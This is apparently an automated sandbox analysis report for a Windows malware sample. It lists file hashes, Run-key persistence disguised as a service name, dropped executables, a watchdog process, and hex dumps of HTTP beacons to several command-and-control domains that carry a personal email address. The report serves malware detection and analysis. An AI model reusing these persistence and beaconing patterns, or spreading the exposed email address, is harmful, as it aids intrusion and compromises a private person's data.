Analysis Date2015-05-13 08:49:02

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: e0ac58591b71be11dfd85c7c4e3c3885 sha1: cbdfc002b8aa6e0222827a0b588ef1878be2f135 size: 295936
Section.rdata md5: e756c7dad4445caa804b6b4246fdb47d sha1: d2c84ca6e26c70148140c1da666c821c9c5a11fa size: 34304 md5: 84809a75cdbd6e73ec167d0832533c89 sha1: 475ce0379d486be23af6c98920bc1a372ac44f7f size: 101376
Timestamp2014-10-30 10:05:22
PackerMicrosoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Discovery Reports Service Time Redirector ➝
C:\Documents and Settings\Administrator\Application Data\rwjzemehoy\oeikqshhj.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\rwjzemehoy\oeikqshhj.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\rwjzemehoy\oeikqshhj.exe

↳ C:\Documents and Settings\Administrator\Application Data\rwjzemehoy\oeikqshhj.exe

Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\rwjzemehoy\oeikqshhj.eh8h
Creates FileC:\Documents and Settings\Administrator\Application Data\rwjzemehoy\ewdsvpl.exe
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\rwjzemehoy\oeikqshhj.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\rwjzemehoy\oeikqshhj.exe"

Network Details:
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Flows TCP192.168.1.1:1031 ➝
Flows TCP192.168.1.1:1032 ➝
Flows TCP192.168.1.1:1033 ➝
Flows TCP192.168.1.1:1034 ➝
Flows TCP192.168.1.1:1035 ➝
Flows TCP192.168.1.1:1036 ➝
Flows TCP192.168.1.1:1037 ➝
Flows TCP192.168.1.1:1038 ➝
Flows TCP192.168.1.1:1039 ➝
Flows TCP192.168.1.1:1040 ➝
Flows TCP192.168.1.1:1041 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6972 656c612e 74726f63   mail=mirela.troc
0x00000020 (00032)   616e406f 69727376 6673652e 726f266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2071   : close..Host: q
0x00000070 (00112)   75696574 666f756e 642e6e65 740d0a0d
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6972 656c612e 74726f63   mail=mirela.troc
0x00000020 (00032)   616e406f 69727376 6673652e 726f266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2071   : close..Host: q
0x00000070 (00112)   75696574 73756363 6573732e 6e65740d
0x00000080 (00128)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6972 656c612e 74726f63   mail=mirela.troc
0x00000020 (00032)   616e406f 69727376 6673652e 726f266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a206e   : close..Host: n
0x00000070 (00112)   69676874 73747261 69676874 2e6e6574
0x00000080 (00128)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6972 656c612e 74726f63   mail=mirela.troc
0x00000020 (00032)   616e406f 69727376 6673652e 726f266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a206e   : close..Host: n
0x00000070 (00112)   69676874 67756172 642e6e65 740d0a0d
0x00000080 (00128)   0a0a0d0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6972 656c612e 74726f63   mail=mirela.troc
0x00000020 (00032)   616e406f 69727376 6673652e 726f266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2065   : close..Host: e
0x00000070 (00112)   6c656374 72696361 6972706c 616e652e   lectricairplane.
0x00000080 (00128)   6e65740d 0a0d0a                       net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6972 656c612e 74726f63   mail=mirela.troc
0x00000020 (00032)   616e406f 69727376 6673652e 726f266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2065   : close..Host: e
0x00000070 (00112)   6c656374 72696367 75617264 2e6e6574
0x00000080 (00128)   0d0a0d0a 0a0d0a                       .......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6972 656c612e 74726f63   mail=mirela.troc
0x00000020 (00032)   616e406f 69727376 6673652e 726f266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2065   : close..Host: e
0x00000070 (00112)   6c656374 72696366 656e6365 2e6e6574
0x00000080 (00128)   0d0a0d0a 0a0d0a                       .......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6972 656c612e 74726f63   mail=mirela.troc
0x00000020 (00032)   616e406f 69727376 6673652e 726f266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2073   : close..Host: s
0x00000070 (00112)   74726565 74677561 72642e6e 65740d0a
0x00000080 (00128)   0d0a0d0a 0a0d0a                       .......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6972 656c612e 74726f63   mail=mirela.troc
0x00000020 (00032)   616e406f 69727376 6673652e 726f266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2074   : close..Host: t
0x00000070 (00112)   72616465 67756172 642e6e65 740d0a0d
0x00000080 (00128)   0a0a0d0a 0a0d0a                       .......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6972 656c612e 74726f63   mail=mirela.troc
0x00000020 (00032)   616e406f 69727376 6673652e 726f266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2073   : close..Host: s
0x00000070 (00112)   74726565 7466656e 63652e6e 65740d0a
0x00000080 (00128)   0d0a0d0a 0a0d0a                       .......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6972 656c612e 74726f63   mail=mirela.troc
0x00000020 (00032)   616e406f 69727376 6673652e 726f266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2071   : close..Host: q
0x00000070 (00112)   75696574 66656e63 652e6e65 740d0a0d
0x00000080 (00128)   0a0a0d0a 0a0d0a                       .......

         (((((                  H
         h((((                  H
An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
bad allocation
bad exception
 Base Class Array'
 Class Hierarchy Descriptor'
 Complete Object Locator'
`copy constructor closure'
- CRT not initialized
dddd, MMMM dd, yyyy
`default constructor closure'
DOMAIN error
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
Eqjqdadwc tvjiczou tnoni userka dddudd jmopiea mnpoxumi clog czelu ele fiun lviretgcik djlu lbrua lgke pczada wfija fnhaavnif tdeusar jcwe rafipaptux afyqovn rgz nappogj sjiem amjvunf drekax pticamfju jsgavyn kjnaomctig fseciwsbac cvrote rtnaln zjkalclo ywefeht odx cnucig zdzacfna uqal xzeregf rdgeueo rjgixn ojfgewtm nlrottoe dveab szed hdanevlefe rmbuu psdaldl lprohzt pdge zgkuccdum gtjag beffi mppagbij mbailov uffamuppzu ovcfef mfzoja peicuyanf tju nud dlcez rpsuzkfi jeg fvlu gpijojbfo ocwlu dnpasicpic klb rtfezbqucc dno nopmism gfobumrb glni upbjabbsu sdulem hjnoypeesi ufdr sefoimu zgtebpna lcciqp opfn jujjonpbe btihavucg gdcivkf tsdamcm aibgc wncelrlu faqrov vnutef cfs oxnuc mtrasfji lhba oiosazcapc rjy gkifiwiwr fpi vcpubeds afcaoxunzg vobgo nvjio ebgwoqpyaj cluye wzcab sxgo bmjo zcaoog vnfep nplos tfqisnmoho qapozemp mpnofmiv aegbl abrce budjul dgunafrsa flnu fbdatovli itkudewhmi zdrop bwf sqfuapopju vkehuct anfjojrvia bbpahub gnsaha mpjalugae
- floating point support not loaded
invalid string position
jgco idu dtfab fogmomllu yjenegc eanh ibv ebgpiengbu mafbolop imdmulot usl scsozalcog iko ablzoqoc ninpuj tfciffuc jpcelbdo eudr bkjid abnlegpbac wghibjcuf mlalov zdula cofgu rmbaai snjogcn ftuoka ubei glsujbwapu sazjedzdem leqmumwwal llgaesh cailjedrsu zuxfoneo faogjo lttirzr vbpojws tlzohxda fyletgigun dlotomsg jnepeeu ztmulbcet uid ooq celsiuelgs oodae gmh dbzirj bnnacn ejvyepv glaziffvoz oasucbue gnmu japgomznuz feji wxnilmpezj etyyu pnyif iwsg ngtodey yale rijihohbyo cgdah suck eangikibbz eazfwiil frdaglyo nrbizu bcmuslo rdsuv olosmos vzcesbjil ramnejvqi jaz udk gluha fibm sygopfk fsv ocp jusuhivc gxpuijtg nrocis vebho njzus envrusbgid gbahi njgi cnbaglka xmxucvgi aed idfkujnnua tzca zrgejvdugz fbmeek dmokashta gggodqr lot mleifu dog hpguepzruj nncut fqd tabfaf wsgip sjcoszjia mubvitmfun ifgcapudn pvtovfif ulmla ilbbeoin ufjapoefnr csbaivjyef bnridrli tcce ddaod lgimeb zoms sqbovdpa dirudup nggilev laavl gkcimbpeqw huznivcjar oiabileuj frdifjawip ofefixiqbv fagneblr lnufucwbe ijynu npmofta sbluiofpl iig lcemuuh ubim ghv izqoe coqvu aragmucc ozclezta qfla ldder bsloghb migqult sjrilpl urzreavsto nfoaci bjuluolf klsitf ekb amnmelu jdoqupzz xspej rdvec mgqieurf gjmaprje cmsovmgus mocwolu blo zfjojdwotu sneufefe ellb ilmm fcdeyjfene nbfifbj rjd qujmisfa odtge fjla avzq vsmerb bmipapimr bfsopgpi adobu aomsco blpo ccf nofaejilr aevwqob paevde gpdu zampewid ggimi tfva gdn besvuqd afdlagjnu lxcedtc qpdi lmca witlogefz dnt zux hfgo rcs axnniboapa pnp tubvacp paz sobjeeaixo incmeute mbkem hpba cgefam gcpasizjun bpedouzfp xdo yrijosgdag lbpe enccit bpcaid icmgercnua str gfivedgt djauouroxy ssfawjxuit sszehufbi vtbauxm nftilm rducujjzuc exugri bnwuigibm bvdeumjlac rtm hfcaku epvagiz blaz scq jfj rdbovghepf eqbduenf znda sblaufsniu dgzi kgdoeuwj bctelphos dojhaoccdo bar ojtguatdab mlricn bbam mvdoaczpia lff ljfioxo dydeev vdmeejoto qsfu ucguza tgguul cutsujcum vtueibiae uplrizbad kktibf llbifulsi ganduopilv fkdunoense cybaf sgtida iqdpardu bpsajsgakn eemgzaQ^
j@j ^V
jvbagcdifv fbriosfip tuxdiogple jrbuq bdj lzcehfgox qwb vzhugss kqcukribo fgeaifu tkazojb vqluc mtnesxo lvjuey ffvi nnivifto cmb edfbouo llxe cksinpgu caicpowd ediogpil vcfe bno jnp awy jund rlipijnv kydujcmic ejjzolnz yrcojsj dvbomt xiyj kappoarmm rdu cmeyoo ejudfaai ljgaezjya eegpiluwjs favxabnx psbe odpan ughtudj rdjibpborm ddlioilnv kaowfer idohp hgfufuqx scgod jov llosivjpa gnl fupmicj rmopoeng recbagj iplvarmi jbba spse ddjewdpau movj quuugpabe riguw bsre ulge bdmipl bbwiuszqe xrbizm xodudujjne jyqeb nzceycei
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
Microsoft Visual C++ Runtime Library
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
TLOSS error
 Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'
